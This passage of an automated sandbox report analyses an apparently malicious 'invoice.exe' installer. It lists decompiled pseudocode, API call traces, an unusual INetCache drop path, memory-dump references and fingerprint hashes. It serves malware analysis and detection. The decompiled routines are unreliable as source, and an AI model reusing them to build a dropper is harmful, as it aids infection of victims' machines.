						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004055CF(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004055EC(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405552(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405F65("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository\\Diskofils\\Justiciaryship", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x00402237
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x00402954
0x00402960

APIs

Part of subcall function 00405996: CharNextA.USER32(?,?,0042BC78,?,00405A02,0042BC78,0042BC78,76793410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A4
Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 00405552: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405595

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship, xrefs: 00401631

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship
API String ID: 1892508949-1385751471
Opcode ID: 6e9d8b0bdd6535f5ad521cfe25d2546e39bd3477eb11d702e3e3618c9b95e55c
Instruction ID: 323619fe81b3529d61600e1e0eff0ce417d4ac591c1c2d39a63079fc07480124
Opcode Fuzzy Hash: 6e9d8b0bdd6535f5ad521cfe25d2546e39bd3477eb11d702e3e3618c9b95e55c
Instruction Fuzzy Hash: 2B11C431608152EBCB217BA54D415BF2AB4DA96324B28093FE9D1B22E2D63D4D425A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00405E4C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405DEB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00405e5a
0x00405e5c
0x00405e74
0x00405e79
0x00405e7e
0x00405ebb
0x00405ebb
0x00405e80
0x00405e92
0x00405e9d
0x00405ea3
0x00405ead
0x00000000
0x00000000
0x00405ead
0x00405ec0

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406090,80000002), ref: 00405E92
RegCloseKey.ADVAPI32(?,?,00406090,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll), ref: 00405E9D

Strings

Call, xrefs: 00405E4F, 00405E83

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 792f73651c5f0961c7d778f0fa8b648c5274768340d5a4a072e3937443cccb1f
Instruction ID: 9bec2c93df88531f10cf132d6bbbb6393b4a4aad9e102c5e2669e285c315f56d
Opcode Fuzzy Hash: 792f73651c5f0961c7d778f0fa8b648c5274768340d5a4a072e3937443cccb1f
Instruction Fuzzy Hash: B7015A72500619ABEF228F61CD09FDB3BACEF55365F00802AF955A2191D378DA54CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 100027E4 Relevance: 3.2, APIs: 2, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E100027E4(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				int _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004040 != 0 && E10002765(_a4) == 0) {
					 *0x10004044 = _t106;
					if( *0x1000403c != 0) {
						_t106 =  *0x1000403c;
					} else {
						E10002D20(E1000275F(), __ecx);
						 *0x1000403c = _t106;
					}
				}
				_t31 = E100027A1(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E10002795();
					_t81 = _a4;
					_t90 =  *0x10004048;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004048 = _t81;
					E1000278F();
					_t36 = EnumResourceTypesA(??, ??, ??); // executed
					 *0x1000401c = _t36;
					 *0x10004020 = _t90;
					if( *0x10004040 != 0 && E10002765( *0x10004048) == 0) {
						 *0x1000403c = _t107;
						_t107 =  *0x10004044;
					}
					_t91 =  *0x10004048;
					_a4 = _t91;
					 *0x10004048 =  *((intOrPtr*)(E10002795() + _t91));
					_t40 = E10002773(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E100027A1(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E100027AC() + _a4 + _v8);
							_push(E100027B6());
							if( *0x10004040 <= 0 || E10002765(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000403c =  *0x1000403c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004048 == 0) {
						 *0x1000403c = 0;
					}
					_t94 = _a4 + E100027AC();
					 *(E100027BA() + _t94) =  *0x1000401c;
					 *((intOrPtr*)(E100027BE() + _t94)) =  *0x10004020;
					E100027CE(_a4);
					if(E10002781() != 0) {
						 *0x10004058 = GetLastError();
					}
					return _a4;
				}
				_push(E100027AC() + _a4);
				_t65 = E100027B2();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E100027BE();
				_t100 = E100027BA();
				_t103 = E100027B6();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x100027f4
0x10002805
0x10002812
0x10002826
0x10002814
0x10002819
0x1000281e
0x1000281e
0x10002812
0x1000282f
0x10002834
0x1000283a
0x1000287e
0x1000287e
0x10002883
0x10002888
0x1000288e
0x10002890
0x10002896
0x100028a3
0x100028a5
0x100028aa
0x100028b7
0x100028ca
0x100028d0
0x100028d6
0x100028d7
0x100028dd
0x100028e9
0x100028ef
0x100028f7
0x100028f8
0x100028fb
0x10002906
0x10002908
0x10002914
0x1000291a
0x10002922
0x1000294e
0x1000294f
0x10002955
0x10002955
0x1000295c
0x10002932
0x10002932
0x10002933
0x10002941
0x1000294a
0x1000294a
0x10002922
0x10002906
0x10002965
0x10002967
0x10002967
0x10002979
0x10002986
0x10002994
0x1000299a
0x100029a8
0x100029b0
0x100029b0
0x100029be
0x100029be
0x10002845
0x10002846
0x1000284b
0x1000284f
0x10002854
0x10002868
0x10002869
0x1000286a
0x1000286c
0x10002871
0x10002873
0x10002873
0x10002876
0x1000287c
0x00000000

APIs

EnumResourceTypesA.KERNEL32(00000000), ref: 100028A3
GetLastError.KERNEL32 ref: 100029AA

Memory Dump Source

Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_invoice.jbxd

Similarity

API ID: EnumErrorLastResourceTypes
String ID:
API String ID: 1485949383-0
Opcode ID: 06dad9edf242867fa2d433b3a0ae819eccaab9780a225514c3bf782f990559be
Instruction ID: 7088a7f0c219bdfd589eed4d744adbaf06b55c7882bf085a68ef70f7e309f44b
Opcode Fuzzy Hash: 06dad9edf242867fa2d433b3a0ae819eccaab9780a225514c3bf782f990559be
Instruction Fuzzy Hash: 385194BA908215DFF711EF60D9C575937A8EB443E0F21842AEA08E721DDF34A9818B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040246D Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040246D(int* __ebx, char* __esi) {
				void* _t17;
				char* _t18;
				long _t21;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402B01(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402AC1(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x3c) = 0x400;
					_t21 = RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x3c); // executed
					if(_t21 != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00405EC3(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x3ff] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33);
					RegCloseKey();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *(_t37 - 4);
				return 0;
			}

0x0040246d
0x0040246d
0x00402472
0x00402479
0x0040247b
0x00402482
0x00402484
0x00402716
0x0040248a
0x0040248d
0x0040249d
0x004024a8
0x004024d8
0x004024d8
0x004024da
0x004024aa
0x004024ae
0x004024c7
0x004024ce
0x004024d1
0x004024b0
0x004024b3
0x004024be
0x00402535
0x00000000
0x00000000
0x00000000
0x004024b3
0x004024ae
0x0040253b
0x0040253c
0x0040253c
0x00402954
0x00402960

APIs

RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040249D
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstA9F8.tmp,00000000,00000011,00000002), ref: 0040253C

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: d5f40faacd95a21481491f01a0c82694c2c8638f2aef99c4c7bd6aebdaa41cb0
Instruction ID: 63e30908c11e451fd6d37fbe2862c18829a27713504d584fb03aa75526d5f0f4
Opcode Fuzzy Hash: d5f40faacd95a21481491f01a0c82694c2c8638f2aef99c4c7bd6aebdaa41cb0
Instruction Fuzzy Hash: 0D110471A00205EECB14CF64DA889AF7AB4DF04304F20403FE446B72C0D6B88A42DB29

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f450;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ebec =  *0x42ebec + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ebec, 0x7530,  *0x42ebd4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00401E25 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E43
EnableWindow.USER32(00000000,00000000), ref: 00401E4E

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: a14bac78f0f093d0819e34cdb63e8fe71bbe50b719fbc7a327d4eb1dfebe48e0
Instruction ID: 3dc443410be61cb95396677418e376cd67e931bc8a1c74ede8e95758ff339cf3
Opcode Fuzzy Hash: a14bac78f0f093d0819e34cdb63e8fe71bbe50b719fbc7a327d4eb1dfebe48e0
Instruction Fuzzy Hash: B3E01272B082129FD714EBB6AA495AE77B4EB40325B10403BE415F11D1DE7888419F5D

Uniqueness

Uniqueness Score: -1.00%

Function 004062FD Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062FD(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E0040628F(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406305
0x00406308
0x0040630f
0x00406317
0x00406323
0x00000000
0x0040632a
0x0040631a
0x00406321
0x00000000
0x00406332
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
GetProcAddress.KERNEL32(00000000,?), ref: 0040632A

Part of subcall function 0040628F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062A6
Part of subcall function 0040628F: wsprintfA.USER32 ref: 004062DF
Part of subcall function 0040628F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
Instruction ID: 0a5867ae11c12db0e7684f2d0d3995392d51af775f5f68958dac655171f1c28e
Opcode Fuzzy Hash: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
Instruction Fuzzy Hash: 83E08C32604221ABD210AB749E0493B63A8EF98740306483EF94AF2240DB3C9C7296A9

Uniqueness

Uniqueness Score: -1.00%

Function 00405AFE Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405AFE(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405b02
0x00405b0f
0x00405b24
0x00405b2a

APIs

GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\invoice.exe,80000000,00000003), ref: 00405B02
CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B24

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405AD9 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AD9(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405ade
0x00405ae4
0x00405ae9
0x00405af2
0x00405af2
0x00405afb

APIs

GetFileAttributesA.KERNELBASE(?,?,004056F1,?,?,00000000,004058D4,?,?,?,?), ref: 00405ADE
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405AF2

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
Instruction ID: a8f15113e5c9b75401305b8f42f7b900fd80c9315a1f16fe78aaf2180abbdc87
Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
Instruction Fuzzy Hash: B8D0C972504122ABC2102728AE0889BBB55DB54271702CB35F9B9A26B1DB304C56AA98

Uniqueness

Uniqueness Score: -1.00%

Function 004055CF Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055CF(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004055d5
0x004055dd
